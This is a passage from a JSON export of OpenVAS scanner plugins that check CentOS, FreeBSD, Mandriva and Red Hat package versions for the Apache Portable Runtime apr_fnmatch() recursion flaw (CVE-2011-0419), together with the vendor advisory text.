script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881329", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881329", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-May/017556.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881329\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:25:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0507\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos5 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"apr on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:44", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apr1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231069767", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069767", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apr10.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 00b296b6-7db1-11e0-96b7-00300582f9fc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69767\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: apr1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: apr1\n\nCVE-2011-0419\nStack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.apache.org/dist/apr/Announcement1.x.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/00b296b6-7db1-11e0-96b7-00300582f9fc.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apr1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.4.1.3.11\")<0) {\n txt += 'Package apr1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Mandriva Update for apr MDVSA-2011:084 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310831393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831393", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apr MDVSA-2011:084 (apr)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-05/msg00005.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831393\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2011:084\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"Mandriva Update for apr MDVSA-2011:084 (apr)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2010\\.0|2009\\.0)\");\n script_tag(name:\"affected\", value:\"apr on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker\n could use this flaw to cause an application using this function,\n which also accepted untrusted input as a pattern for matching (such\n as an httpd server using the mod_autoindex module), to exhaust all\n stack memory or use an excessive amount of CPU time when performing\n matching (CVE-2011-0419).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880563", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880563", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-May/017554.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880563\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2011:0507\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"apr on CentOS 4\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "RedHat Update for apr RHSA-2011:0507-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870432", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870432", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for apr RHSA-2011:0507-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-May/msg00011.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870432\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"RHSA\", value:\"2011:0507-01\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"RedHat Update for apr RHSA-2011:0507-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(5|4)\");\n script_tag(name:\"affected\", value:\"apr on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n\n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n\n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~25.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-debuginfo\", rpm:\"apr-debuginfo~0.9.4~25.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~25.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:58", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apr0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231070602", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070602", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apr00.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 38560d79-0e42-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70602\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-0419\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: apr0\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", 